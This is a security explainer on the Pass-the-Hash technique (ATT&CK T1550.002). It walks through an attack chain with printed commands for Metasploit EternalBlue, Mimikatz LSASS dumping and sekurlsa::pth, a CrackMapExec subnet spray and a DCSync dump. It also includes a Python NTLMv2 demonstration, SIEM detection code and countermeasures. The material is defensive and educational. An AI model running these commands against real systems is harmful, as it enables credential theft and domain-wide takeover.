ATT&CK Technique T1550.002 - Use Alternate Authentication Material: Pass the Hash (tactics: Defense Evasion, Lateral Movement)

PASS-THE-HASH

A credential theft technique that authenticates as a user with that user's captured NT (NTLM) hash - without ever knowing the plaintext password.

CRITICAL SEVERITY - LATERAL MOVEMENT VECTOR
Primary Protocol
NTLM
NT LAN Manager challenge-response authentication used extensively in Windows environments
Attack Category
LATERAL
Enables movement across systems without cracking or knowing the original password
First Documented
1997
Described by Paul Ashton - remains highly effective in modern Windows domain environments
01 - Anatomy of an NTLM Hash

A credential dump entry (pwdump / secretsdump format) has four colon-separated fields:

  Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::

  • Administrator - USERNAME: account name on the target system
  • 500 - RID (Relative Identifier): 500 is always the built-in Administrator account
  • aad3b435b51404eeaad3b435b51404ee - LM HASH: this well-known value is the LM hash of an empty password, i.e. no LM hash is stored (LM hashing is disabled by default since Windows Vista / Server 2008, and is also skipped for passwords longer than 14 characters). Historically very weak.
  • 8846f7eaee8fb117ad06bdd830b7586c - NT HASH: MD4 of the UTF-16LE encoded password, with no salt. THIS IS WHAT ATTACKERS USE. (This particular value is the NT hash of the string "password".)

Layout: Username : RID : LM Hash (often disabled) : NT Hash (weaponized)

KEY INSIGHT: NTLM authentication never transmits the password. The NT hash is the key: the server sends a random challenge, the client answers with a response computed from the hash (HMAC-MD5 for NTLMv2, DES for NTLMv1), and the server - or its domain controller - checks that response using the same stored hash. Anyone holding the hash can therefore compute a valid response to any fresh challenge, which makes the hash functionally equivalent to the password for NTLM.

02 - Attack Flow Overview

  ① INITIAL ACCESS  - attacker compromises a host
  ② CREDENTIAL DUMP - LSASS / SAM hash extraction on the compromised host
  ③ HARVEST HASH    - NT hash 8846f7ea... stolen
  ④ INJECT HASH     - PtH tool (Mimikatz / Impacket) authenticates with the hash
  ⑤ LATERAL MOVE    - target pwned; repeat steps ② to ⑤ from the new host
03 - Step-by-Step Walkthrough

Phase 01 - Reconnaissance & Initial Compromise

INITIAL ACCESS

The attacker first gains a foothold on any machine within the target network. This is the prerequisite for all subsequent steps. The method of initial access can vary widely.

  • Phishing email delivers malicious payload or credential harvester
  • Exploitation of unpatched vulnerability (e.g., EternalBlue/MS17-010)
  • Password spray or credential stuffing against VPN/RDP/OWA
  • Supply chain compromise or malicious insider
  • Physical access - USB drop, rogue device on network
attacker@c2 - initial_access.sh

  $ nmap -p 445 --script smb-vuln-ms17-010 192.168.1.0/24
  Starting Nmap 7.94 ...
  Host: 192.168.1.45
  |   VULNERABLE: Remote Code Execution
  |   MS17-010: EternalBlue
  |   Risk factor: HIGH

  $ msfconsole -q -x "use exploit/windows/smb/ms17_010_eternalblue"
  msf6 > set RHOSTS 192.168.1.45
  msf6 > run
  [*] Meterpreter session 1 opened
Phase 02 - Privilege Escalation

FOOTHOLD & PRIVESC

To extract hashes from LSASS (Local Security Authority Subsystem Service), the attacker needs SYSTEM or Administrator-level privileges. Several escalation paths exist on Windows.

  • Token impersonation via Meterpreter getsystem / Incognito
  • UAC bypass (Fodhelper, CMSTP, DLL hijacking)
  • Exploit local kernel vulnerability for SYSTEM access
  • SeDebugPrivilege required to read LSASS process memory (held by administrators, enabled with privilege::debug); if LSA protection (RunAsPPL) is on, LSASS is a protected process and a signed driver or other PPL bypass is needed as well
  • SeImpersonatePrivilege - Potato attacks (PrintSpoofer, etc.)
meterpreter - privesc

  meterpreter > getuid
  Server username: CORP\jsmith
  meterpreter > getsystem
  ...got system via technique 1 (Named Pipe Impersonation)
  meterpreter > getuid
  Server username: NT AUTHORITY\SYSTEM
  meterpreter > ps -S lsass
   PID   Name       Arch  Session  User
   632   lsass.exe  x64   0        NT AUTHORITY\SYSTEM
Phase 03 - Credential Access

HASH EXTRACTION

With SYSTEM privileges, the attacker dumps NTLM hashes from LSASS memory or the SAM/NTDS.dit database. These hashes are the "keys" that will be replayed against other systems.

  • Mimikatz sekurlsa::logonpasswords - reads the NT hashes (and, where WDigest is enabled, plaintext) of currently logged-on users from LSASS memory
  • Mimikatz lsadump::sam - reads local account hashes from the SAM registry hive, decrypted with the boot key from the SYSTEM hive
  • Impacket secretsdump.py - remote (over SMB / remote registry) or local (from saved hives or NTDS files) hash dumping
  • Cached domain credentials (DCC2 via lsadump::cache) and DPAPI-protected secrets - note that DCC2 values cannot be passed, only cracked
  • NTDS.dit (Active Directory database) holds ALL domain hashes; reachable by copying the file on a DC or, without touching disk, via DCSync
mimikatz - hash dump

  mimikatz # privilege::debug
  Privilege '20' OK

  mimikatz # sekurlsa::logonpasswords

  Authentication Id : 0 ; 456280
  Session           : Interactive
  User Name         : Administrator
  Domain            : CORP
          msv :
           * NTLM       : 8846f7eaee8fb117ad06bdd830b7586c
  [!] Hash captured - ready for PtH
Phase 04 - Credential Use

PASS THE HASH

The hash is injected into a new logon session or handed to a tool that speaks NTLM. Because NTLM's challenge-response uses the NT hash itself as the key, a valid response to the server's challenge can be computed from the hash alone - no password cracking needed.

  • sekurlsa::pth - starts a process in a new logon session (logon type 9, NewCredentials) whose cached NTLM secret, and RC4 Kerberos key, is the supplied hash
  • Locally that process still runs as the attacker's account; it authenticates as the victim whenever it touches a network resource, over NTLM or (using the hash as RC4 key) Kerberos
  • Impacket's wmiexec.py / psexec.py accept the hash via -hashes LM:NT (the LM half may be left empty: -hashes :NT)
  • CrackMapExec (-H) automates PtH across entire subnets at once
  • No plaintext password is ever needed or used during this phase
mimikatz - pass the hash

  mimikatz # sekurlsa::pth /user:Administrator /domain:CORP /ntlm:8846f7eaee8fb117ad06bdd830b7586c /run:cmd.exe
  user    : Administrator
  domain  : CORP
  program : cmd.exe
  NTLM    : 8846f7eaee8fb117ad06bdd830b7586c
  [+] New cmd.exe spawned in a NewCredentials logon session
  [+] Its network authentications will be made as CORP\Administrator using the injected hash
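The challenge-response behind both the KEY INSIGHT in section 01 and this phase, worked through as an added example (not code from the page or from Mimikatz/Impacket): the client's NTLMv2 response and the server's verification are both computed from the NT hash alone, following the NTOWFv2 / NTProofStr construction in MS-NLMP. The hash is the page's Administrator value; the user, domain, target-info AV pairs and the challenge values are constructed for the demo. The LMv2 response and session-key derivation are left out.

```python
import hashlib
import hmac
import os
import struct


def ntowf_v2(nt_hash_hex: str, user: str, domain: str) -> bytes:
    """ResponseKeyNT (MS-NLMP 3.3.2): HMAC-MD5 keyed with the NT hash over
    UPPER(user) + domain in UTF-16LE. The password never enters this computation."""
    key = bytes.fromhex(nt_hash_hex)
    return hmac.new(key, (user.upper() + domain).encode("utf-16-le"), hashlib.md5).digest()


def av_pair(av_id: int, value: bytes) -> bytes:
    """AV_PAIR: AvId (2 bytes LE), AvLen (2 bytes LE), value."""
    return struct.pack("<HH", av_id, len(value)) + value


def build_temp(client_challenge: bytes, timestamp: int, target_info: bytes) -> bytes:
    """The 'temp' blob: RespType=1, HiRespType=1, 6 reserved bytes, 8-byte FILETIME,
    8-byte client nonce, 4 reserved bytes, the server's AV_PAIR list, 4 reserved bytes."""
    return (b"\x01\x01" + b"\x00" * 6 + struct.pack("<Q", timestamp)
            + client_challenge + b"\x00" * 4 + target_info + b"\x00" * 4)


def ntlmv2_response(nt_hash_hex, user, domain, server_challenge, client_challenge, timestamp, target_info) -> bytes:
    """Client side (what a PtH tool does): NtChallengeResponse = NTProofStr || temp,
    with NTProofStr = HMAC-MD5(ResponseKeyNT, ServerChallenge || temp)."""
    key = ntowf_v2(nt_hash_hex, user, domain)
    temp = build_temp(client_challenge, timestamp, target_info)
    proof = hmac.new(key, server_challenge + temp, hashlib.md5).digest()
    return proof + temp


def server_verify(stored_nt_hash_hex, user, domain, server_challenge, response) -> bool:
    """Server / DC side: recompute NTProofStr from the stored NT hash and compare.
    The verifier also needs nothing but the hash, which is why the hash is password-equivalent."""
    proof, temp = response[:16], response[16:]
    key = ntowf_v2(stored_nt_hash_hex, user, domain)
    expected = hmac.new(key, server_challenge + temp, hashlib.md5).digest()
    return hmac.compare_digest(proof, expected)


# Constructed target info as a server would send it in CHALLENGE_MESSAGE:
# MsvAvNbDomainName (2), MsvAvNbComputerName (1), MsvAvEOL (0).
TARGET_INFO = (av_pair(2, "CORP".encode("utf-16-le"))
               + av_pair(1, "DC01".encode("utf-16-le"))
               + av_pair(0, b""))

NT_HASH = "8846f7eaee8fb117ad06bdd830b7586c"  # the page's Administrator hash


def exchange(nt_hash_hex=NT_HASH, user="Administrator", domain="CORP"):
    """One full challenge/response with fresh nonces.
    Returns (accepted_with_correct_hash, accepted_with_wrong_hash)."""
    server_challenge = os.urandom(8)  # sent by the server in CHALLENGE_MESSAGE
    client_challenge = os.urandom(8)  # chosen by the client for AUTHENTICATE_MESSAGE
    resp = ntlmv2_response(nt_hash_hex, user, domain, server_challenge, client_challenge, 0, TARGET_INFO)
    accepted = server_verify(nt_hash_hex, user, domain, server_challenge, resp)
    # the NT hash of an empty password stands in for a wrong hash
    rejected = server_verify("31d6cfe0d16ae931b73c59d7e0c089c0", user, domain, server_challenge, resp)
    return accepted, rejected


if __name__ == "__main__":
    print("accepted with hash only / accepted with wrong hash:", exchange())
```

Because the server challenge is fresh each time, a captured response cannot simply be replayed; what PtH replays is the key, not the exchange. The same property is what makes NTLM relay a separate technique: the relay forwards a live challenge to the victim rather than holding the hash.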
Phase 05 - Lateral Movement

LATERAL MOVEMENT

Using the injected hash, the attacker connects to other machines on the network where the account is valid. Domain admin hashes provide access to every machine in the domain.

  • SMB/PSEXEC to run commands on remote hosts via port 445
  • WMI - Windows Management Instrumentation remote execution
  • WinRM - PowerShell Remoting (port 5985/5986)
  • CrackMapExec sprays hash across entire subnets instantly
  • Any host where the compromised user has local admin rights is accessible. Caveat for local (non-domain) accounts: UAC remote restrictions filter the token of local administrators other than RID 500, so PtH with such an account fails unless LocalAccountTokenFilterPolicy is set to 1; the built-in Administrator is exempt
crackmapexec - lateral movement

  $ cme smb 192.168.1.0/24 -u Administrator -H 8846f7eaee8fb117ad06bdd830b7586c
  SMB  192.168.1.10   [*] Windows Server 2019
  SMB  192.168.1.10   [+] CORP\Administrator (Pwn3d!)
  SMB  192.168.1.45   [+] CORP\Administrator (Pwn3d!)
  SMB  192.168.1.101  [+] CORP\Administrator (Pwn3d!)
  SMB  192.168.1.200  [-] CORP\Administrator STATUS_LOGON_FAILURE
  [*] 3/4 hosts compromised
Phase 06 - Domain Dominance

ESCALATION TO DA

The ultimate goal: compromise the Domain Controller and dump NTDS.dit, obtaining hashes for every domain user. The attacker can now impersonate any user in the entire organization.

  • Access the DC via PtH with a domain admin hash (or any account holding replication rights)
  • Dump NTDS.dit - Active Directory's password database (a VSS / ntdsutil copy plus the SYSTEM hive for the boot key)
  • Create a Golden Ticket using the krbtgt hash - survives resets of every other account's password and persists until the krbtgt password is reset twice
  • DCSync attack - request replication (DRSUAPI GetNCChanges) as a DC would; needs the Replicating Directory Changes rights that Domain Admins hold by default, and runs no code on the DC
  • Entire domain compromised - all user hashes available for PtH
impacket - domain controller

  $ secretsdump.py -hashes :8846f7ea... CORP/Administrator@dc01.corp.local
  [*] Dumping Domain Credentials (NTDS.dit)
  [*] Using the DRSUAPI method (DCSync)
  Administrator:500:aad3b...:8846f7ea...:::
  krbtgt:502:aad3b...:31d6cfe0...:::
  jsmith:1105:aad3b...:a87f3a33...:::
  ... 847 more accounts ...
  [!] DOMAIN FULLY COMPROMISED
04 - Attacker Toolkit

Mimikatz
PRIMARY - PtH TOOL
The gold standard. sekurlsa::pth injects hashes into new processes. Also extracts hashes from LSASS, SAM, and cached credentials.
CrackMapExec
LATERAL MOVEMENT
Automates PtH at scale across entire subnets (the project is continued as NetExec). Supports SMB, WinRM, MSSQL, LDAP. Identifies where credentials are valid and marks hosts where they grant admin access as Pwn3d!.
Impacket Suite
REMOTE EXECUTION
Python tools: psexec.py, wmiexec.py, smbexec.py all support hash authentication via -hashes flag. secretsdump for NTDS.
Metasploit
EXPLOITATION FRAMEWORK
smb/psexec module accepts NTLM hashes. Hashdump post module extracts SAM hashes after Meterpreter session established.
Rubeus
KERBEROS ATTACKS
Overpass-the-Hash: uses the NT hash as the RC4-HMAC key to request a Kerberos TGT (asktgt /rc4:<hash>), then authenticates with Kerberos instead of NTLM, sidestepping NTLM-focused detection. Caveat: the resulting Event ID 4768 shows an RC4 (type 0x17) TGT request for a user who normally uses AES, which is itself a common detection signal; attackers with the AES key use /aes256 to avoid it.
Evil-WinRM
WINRM SHELL
Full-featured WinRM shell supporting hash-based authentication. Ideal for interactive sessions on targets with PS Remoting enabled.
05 - Defensive Countermeasures

Windows Credential Guard
Moves domain credential secrets out of LSASS into an isolated LSA process (LSAIso) protected by virtualization-based security, so sekurlsa::logonpasswords no longer returns domain NT hashes from LSASS memory - the primary hash dump vector. Requires UEFI and a CPU with virtualization extensions and SLAT; TPM and Secure Boot are recommended to protect the VBS configuration. It does not protect the local SAM, and it does nothing against a hash already obtained elsewhere (for example via DCSync).

Disable NTLM Authentication
Move toward Kerberos-only via the "Network security: Restrict NTLM" GPO settings, auditing NTLM use first - legacy applications and anything addressed by IP rather than hostname still fall back to NTLM. Note that PtH works against NTLMv2 as well: setting "LAN Manager authentication level" to refuse LM and NTLMv1 removes the weakest variants but does not stop PtH on its own, and RC4 must also be disabled for Kerberos to block overpass-the-hash with the NT hash.

Local Admin Password Solution (LAPS)
Randomizes the local Administrator password on every machine and stores it in AD. Prevents a single compromised local admin hash from providing access to every machine in the environment, since each hash is valid on exactly one host.

Privileged Access Workstations (PAW)
Admins use dedicated, hardened workstations for privileged activity. Reduces attack surface by ensuring admin credentials never touch internet-facing or user systems, so no LSASS on a user workstation ever holds a domain admin hash.

SIEM Detection Rules
Alert on Event ID 4624 with LogonType 9 (NewCredentials), LogonProcessName seclogo and AuthenticationPackageName Negotiate - the logon that sekurlsa::pth (and, legitimately, runas /netonly) creates; on type 3 logons with AuthenticationPackageName NTLM from domain accounts that should be using Kerberos; on one source address reaching many hosts over NTLM within seconds (CrackMapExec-style spraying); and on Sysmon Event ID 10 handle access to lsass.exe from unexpected processes. Detect Mimikatz itself via AV/EDR signatures and behavior.
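The first three of those rules, as an added example run over constructed Security-log events (this is not the page's code and not a Sigma rule; the field names follow the 4624/4625 EventData XML, and the hosts, users, timestamps and IP addresses are invented to mirror the walkthrough). The fan-out rule deliberately counts failed logons too, since a sprayed hash produces 4625 on hosts where it is not valid.

```python
from collections import defaultdict
from datetime import datetime, timedelta

DOMAIN = "CORP"  # assumed domain name, as in the walkthrough


def ev(time, host, eid, ltype, pkg, proc, user, dom, ip):
    """Build one event dict with the EventData fields the rules need."""
    return {"time": time, "host": host, "EventID": eid, "LogonType": ltype,
            "AuthenticationPackageName": pkg, "LogonProcessName": proc,
            "TargetUserName": user, "TargetDomainName": dom, "IpAddress": ip}


# Constructed sample: 192.168.1.45 is the foothold from which the hash is sprayed.
EVENTS = [
    # sekurlsa::pth on the foothold: NewCredentials logon through seclogo
    ev("2024-05-01T10:00:00", "WS-042", "4624", "9", "Negotiate", "seclogo", "jsmith", DOMAIN, "::1"),
    # ordinary Kerberos network logon: no alert
    ev("2024-05-01T10:00:05", "SRV-10", "4624", "3", "Kerberos", "Kerberos", "jsmith", DOMAIN, "192.168.1.50"),
    # CrackMapExec-style spray of the Administrator hash across the subnet
    ev("2024-05-01T10:01:00", "SRV-10", "4624", "3", "NTLM", "NtLmSsp", "Administrator", DOMAIN, "192.168.1.45"),
    ev("2024-05-01T10:01:02", "WS-101", "4624", "3", "NTLM", "NtLmSsp", "Administrator", DOMAIN, "192.168.1.45"),
    ev("2024-05-01T10:01:04", "FS-01", "4624", "3", "NTLM", "NtLmSsp", "Administrator", DOMAIN, "192.168.1.45"),
    ev("2024-05-01T10:01:06", "WS-200", "4625", "3", "NTLM", "NtLmSsp", "Administrator", DOMAIN, "192.168.1.45"),
    # machine-account and anonymous NTLM logons are routine noise
    ev("2024-05-01T10:02:00", "SRV-10", "4624", "3", "NTLM", "NtLmSsp", "WS-101$", DOMAIN, "192.168.1.101"),
    ev("2024-05-01T10:02:10", "SRV-10", "4624", "3", "NTLM", "NtLmSsp", "ANONYMOUS LOGON", "NT AUTHORITY", "192.168.1.77"),
]


def is_ntlm_network_attempt(e):
    return (e["EventID"] in ("4624", "4625") and e["LogonType"] == "3"
            and e["AuthenticationPackageName"] == "NTLM")


def rule_seclogo_newcredentials(e):
    """Rule 1: sekurlsa::pth (and runas /netonly) log a type-9 NewCredentials logon via the
    'seclogo' logon process; correlate with the creating process before escalating."""
    return (e["EventID"] == "4624" and e["LogonType"] == "9"
            and e["LogonProcessName"].lower() == "seclogo"
            and e["AuthenticationPackageName"] == "Negotiate")


def rule_ntlm_domain_account(e):
    """Rule 2: successful NTLM network logon by a domain user account where Kerberos is
    expected; machine accounts and ANONYMOUS LOGON are excluded as routine noise."""
    return (is_ntlm_network_attempt(e) and e["EventID"] == "4624"
            and e["TargetDomainName"].upper() == DOMAIN
            and not e["TargetUserName"].endswith("$")
            and e["TargetUserName"].upper() != "ANONYMOUS LOGON")


def rule_ntlm_fanout(events, window=timedelta(seconds=60), min_hosts=3):
    """Rule 3: one source IP attempting NTLM logons (success or failure) against
    >= min_hosts distinct hosts inside the window - the footprint of a sprayed hash."""
    by_src = defaultdict(list)
    for e in events:
        if is_ntlm_network_attempt(e):
            by_src[e["IpAddress"]].append((datetime.fromisoformat(e["time"]), e["host"]))
    findings = {}
    for ip, rows in by_src.items():
        rows.sort()
        for i, (t0, _) in enumerate(rows):
            hosts = {h for t, h in rows[i:] if t - t0 <= window}
            if len(hosts) >= min_hosts:
                findings[ip] = sorted(hosts)
                break
    return findings


def analyze(events):
    """Return (per-event alerts as (rule, host, user) tuples, fan-out sources by IP)."""
    alerts = []
    for e in events:
        if rule_seclogo_newcredentials(e):
            alerts.append(("pth_newcredentials", e["host"], e["TargetUserName"]))
        if rule_ntlm_domain_account(e):
            alerts.append(("ntlm_domain_logon", e["host"], e["TargetUserName"]))
    return alerts, rule_ntlm_fanout(events)


if __name__ == "__main__":
    alerts, fanout = analyze(EVENTS)
    for a in alerts:
        print(*a)
    print("fan-out sources:", fanout)
```

Rule 2 is the noisy one in real estates: before enabling it, baseline which accounts legitimately use NTLM (IP-addressed shares, non-domain-joined appliances) and tune the exclusions, or pair it with the fan-out rule so that a single NTLM logon alone does not page anyone.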
Protected Users Security Group
Placing privileged accounts in Protected Users prevents NTLM authentication for those accounts, forces Kerberos without RC4 or DES (so the NT hash cannot be used for overpass-the-hash either), blocks delegation and prevents credential caching - blocking PtH at the identity level. It covers domain accounts only and needs Windows Server 2012 R2 or later domain controllers.

Tier Model / AD Tiering
Enforce a 3-tier Active Directory model: Tier 0 (DCs and identity infrastructure), Tier 1 (Servers), Tier 2 (Workstations). Higher-tier credentials are never used to log on to lower-tier systems, so a hash dumped from a workstation can never be a Tier 0 hash, limiting lateral movement scope.

EDR & Attack Surface Reduction
Modern EDR solutions detect Mimikatz via behavioral signatures, memory injection patterns, and LSASS handle-access patterns. Enabling LSA protection (RunAsPPL) runs LSASS as a protected process so user-mode tools, even running as SYSTEM, cannot open it without a signed driver or a PPL bypass. The Defender ASR rule "Block credential stealing from the Windows local security authority subsystem" (9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2) blocks the same access path.